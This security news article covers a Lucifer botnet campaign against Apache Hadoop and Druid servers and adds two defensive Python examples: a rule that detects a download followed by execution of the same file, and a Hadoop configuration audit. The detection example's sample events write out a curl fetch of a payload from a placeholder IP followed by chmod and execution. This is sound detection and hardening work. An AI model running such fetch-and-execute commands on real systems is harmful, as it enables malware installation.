
Lucifer Botnet Poses New Threat to Apache Hadoop Servers


A new version of the Lucifer botnet is currently targeting organizations using Apache Hadoop and Apache Druid big data technologies, a recent report from Aqua Nautilus revealed. The Lucifer botnet, which has combined capabilities for cryptojacking and distributed denial of service (DDoS) attacks, is being utilized by the threat actor responsible for the campaign.

The emergence of this campaign marks a significant deviation from the usual behavior of the Lucifer botnet. An analysis from Aqua Nautilus this week indicated that the operators of the botnet are experimenting with new infection processes, suggesting that this could be a prelude to a larger, more widespread campaign.

The Lucifer malware was initially discovered by researchers at Palo Alto Networks in May 2020. Back then, the company identified the threat as a dangerous hybrid malware that combined DDoS capabilities with XMRig for mining the Monero cryptocurrency. The threat was serious because the attackers were also using Lucifer to deploy the NSA's leaked EternalBlue, EternalRomance, and DoublePulsar tools onto the targeted systems.

Researchers also warned at the time that Lucifer was a new and dangerous variant of cryptojacking and DDoS malware, particularly on Windows platforms. This week, it was revealed that the same threat has resurfaced and is now specifically targeting Apache servers.

Aqua Nautilus researchers disclosed that they have observed more than 3,000 unique attacks against Apache Hadoop, Apache Druid, and Apache Flink honeypots over the last month alone. These attacks have persisted for approximately six months and have been characterized by three distinct phases, suggesting that the adversary is refining its tactics and techniques before launching a full-scale offensive.

In the first phase of attacks, the threat actors scanned the Internet for misconfigured Hadoop instances, with a particular interest in the Hadoop YARN technology. Once a vulnerable system was identified, the attackers exploited it to download and execute the Lucifer malware.

The second phase featured a similar approach, targeting misconfigurations in the Hadoop big-data stack. However, in this instance, the attackers deployed two binaries on the compromised system as part of their attack strategy.

Finally, in the third phase, the attackers pivoted their focus to vulnerable Apache Druid hosts, exploiting a known command injection vulnerability to download and execute the Lucifer malware. Notably, they split the downloading and execution of the malware between two binary files in an attempt to bypass detection mechanisms.
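The split between a downloading binary and an executing binary defeats detection rules that expect one process to do both. The following added example, which is not from the Aqua Nautilus report and uses constructed process events rather than real telemetry from the campaign, shows how to key the correlation on the file path instead of the process ID, so that a download by one process followed by execution of the same file from another process still raises an alert. The event format, the `yarn` service user, and the 203.0.113.10 address are assumptions made for the example.

```python
# Added example (not from the report): correlate a file download with a later
# execution of the same path, whichever process performs each step, so that
# splitting "download" and "execute" across two processes does not hide the
# sequence. All events below are constructed for this example.
import os

# One process execution per event, as an EDR or auditd-style collector would
# record it: timestamp in seconds, pid, user, and argv.
SAMPLE_EVENTS = [
    {"ts": 10, "pid": 3010, "user": "yarn",
     "argv": ["curl", "-fsSL", "http://203.0.113.10/stage1", "-o", "/tmp/stage1"]},
    {"ts": 12, "pid": 3011, "user": "yarn", "argv": ["chmod", "+x", "/tmp/stage1"]},
    {"ts": 15, "pid": 3012, "user": "yarn", "argv": ["/tmp/stage1"]},   # run by a different pid
    {"ts": 20, "pid": 3020, "user": "alice",
     "argv": ["wget", "-O", "/home/alice/report.csv", "https://example.com/report.csv"]},
    {"ts": 900, "pid": 3030, "user": "yarn", "argv": ["/tmp/stage1"]},  # outside the window
]

# Flags that name the local output file for each downloader. curl's bare -O
# takes no argument (it reuses the remote name), so it is deliberately absent.
OUTPUT_FLAGS = {
    "curl": {"-o", "--output"},
    "wget": {"-O", "--output-document"},
}


def downloaded_path(argv):
    """Return the local output path of a curl/wget invocation, or None."""
    if not argv:
        return None
    tool = os.path.basename(argv[0])
    flags = OUTPUT_FLAGS.get(tool)
    if flags is None:
        return None
    for i in range(len(argv) - 1):
        if argv[i] in flags:
            return argv[i + 1]
    return None


def correlate_download_then_exec(events, window_seconds=600):
    """Alert when a downloaded file is executed within the window.

    Matching is keyed on the file path, not the pid, so the download and the
    execution may come from different processes.
    """
    recent_downloads = {}   # path -> the event that wrote it
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        path = downloaded_path(ev["argv"])
        if path is not None:
            recent_downloads[path] = ev
            continue
        exe = ev["argv"][0] if ev["argv"] else ""
        dl = recent_downloads.get(exe)
        if dl is None or ev["ts"] - dl["ts"] > window_seconds:
            continue
        alerts.append({
            "path": exe,
            "download_pid": dl["pid"],
            "exec_pid": ev["pid"],
            "user": ev["user"],
            "split_across_processes": dl["pid"] != ev["pid"],
            "seconds_between": ev["ts"] - dl["ts"],
        })
    return alerts


if __name__ == "__main__":
    for alert in correlate_download_then_exec(SAMPLE_EVENTS):
        print(alert)
```

With the sample events the rule produces exactly one alert: the download by pid 3010 and the execution by pid 3012 of `/tmp/stage1` fifteen seconds apart, flagged as split across processes. The execution at 900 seconds falls outside the default window; widening it to 1000 seconds surfaces that one too, which is the usual tuning trade-off between catching delayed execution and accepting more noise.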

The escalation and evolution of the Lucifer botnet's capabilities pose a significant threat to organizations utilizing big data technologies, especially those running Apache Hadoop and Apache Druid. To safeguard against potential cyberattacks, enterprises should proactively review their system configurations for misconfigurations and ensure all patches are up to date. Additionally, deploying rigorous runtime detection and response solutions can help identify and mitigate unknown threats, and teams should be cautious in their use of open-source libraries and code.
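The first two phases of the campaign depended on Hadoop instances whose YARN component was left with its default, unauthenticated configuration. The following added example, which is not from the report or the Hadoop project, turns the "review your configuration" advice into a concrete check: it parses `core-site.xml` and `yarn-site.xml` and flags the settings that, when absent or at their defaults, allow anyone who can reach the ResourceManager to submit work. The property names are real Hadoop configuration keys; the four XML documents are constructed for the example, and the admin ACL value is a placeholder.

```python
# Added example (not from the Aqua Nautilus report or the Hadoop project):
# audit Hadoop core-site.xml and yarn-site.xml for settings that leave YARN
# open to unauthenticated job submission. The XML below is constructed for
# this example; the property names are real Hadoop configuration keys.
import xml.etree.ElementTree as ET

# Weak configuration: authentication explicitly "simple", everything else absent
# (and therefore at its insecure default).
WEAK_CORE_SITE = """<?xml version="1.0"?>
<configuration>
  <property><name>fs.defaultFS</name><value>hdfs://namenode:9000</value></property>
  <property><name>hadoop.security.authentication</name><value>simple</value></property>
</configuration>
"""

WEAK_YARN_SITE = """<?xml version="1.0"?>
<configuration>
  <property><name>yarn.resourcemanager.hostname</name><value>rm</value></property>
</configuration>
"""

# Hardened configuration: Kerberos for RPC and HTTP, authorization on, YARN
# ACLs enabled with an explicit admin list (placeholder principals).
HARDENED_CORE_SITE = """<?xml version="1.0"?>
<configuration>
  <property><name>fs.defaultFS</name><value>hdfs://namenode:9000</value></property>
  <property><name>hadoop.security.authentication</name><value>kerberos</value></property>
  <property><name>hadoop.security.authorization</name><value>true</value></property>
  <property><name>hadoop.http.authentication.type</name><value>kerberos</value></property>
</configuration>
"""

HARDENED_YARN_SITE = """<?xml version="1.0"?>
<configuration>
  <property><name>yarn.resourcemanager.hostname</name><value>rm</value></property>
  <property><name>yarn.acl.enable</name><value>true</value></property>
  <property><name>yarn.admin.acl</name><value>yarn hadoop-admins</value></property>
</configuration>
"""

# (file, key, value Hadoop assumes when the key is absent, weak-if predicate, hardened value)
CHECKS = [
    ("core-site", "hadoop.security.authentication", "simple",
     lambda v: v.lower() != "kerberos", "kerberos"),
    ("core-site", "hadoop.security.authorization", "false",
     lambda v: v.lower() != "true", "true"),
    ("core-site", "hadoop.http.authentication.type", "simple",
     lambda v: v.lower() != "kerberos", "kerberos"),
    ("yarn-site", "yarn.acl.enable", "false",
     lambda v: v.lower() != "true", "true"),
    ("yarn-site", "yarn.admin.acl", "*",
     lambda v: v == "*", "an explicit list of admin users/groups"),
]


def parse_hadoop_xml(text: str) -> dict:
    """Return {name: value} for every <property> in a Hadoop *-site.xml document."""
    props = {}
    for prop in ET.fromstring(text).iter("property"):
        name = prop.findtext("name")
        if name:
            props[name.strip()] = (prop.findtext("value") or "").strip()
    return props


def audit(core_site_xml: str, yarn_site_xml: str) -> list:
    """Return one finding per weak setting; a missing key is judged by its default."""
    configs = {
        "core-site": parse_hadoop_xml(core_site_xml),
        "yarn-site": parse_hadoop_xml(yarn_site_xml),
    }
    findings = []
    for file_, key, default, is_weak, hardened in CHECKS:
        present = key in configs[file_]
        value = configs[file_].get(key, default)
        if is_weak(value):
            findings.append({
                "file": f"{file_}.xml",
                "key": key,
                "value": value if present else f"{default} (default, key absent)",
                "recommended": hardened,
            })
    return findings


if __name__ == "__main__":
    for label, core, yarn in (("weak", WEAK_CORE_SITE, WEAK_YARN_SITE),
                              ("hardened", HARDENED_CORE_SITE, HARDENED_YARN_SITE)):
        result = audit(core, yarn)
        print(f"{label}: {len(result)} finding(s)")
        for f in result:
            print(f"  {f['file']} {f['key']} = {f['value']} -> set to {f['recommended']}")
```

The audit treats an absent key as its Hadoop default, which is the case that matters here: a cluster that never set `hadoop.security.authentication` is running with `simple` authentication even though the string appears nowhere in its configuration. Note that turning on Kerberos also requires keytabs and principals for the daemons; the script only reports the gap, it does not close it.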

As the Lucifer botnet’s activities continue to evolve, it is imperative for organizations to remain vigilant and adopt robust security measures to protect their big data infrastructure from potential attacks.
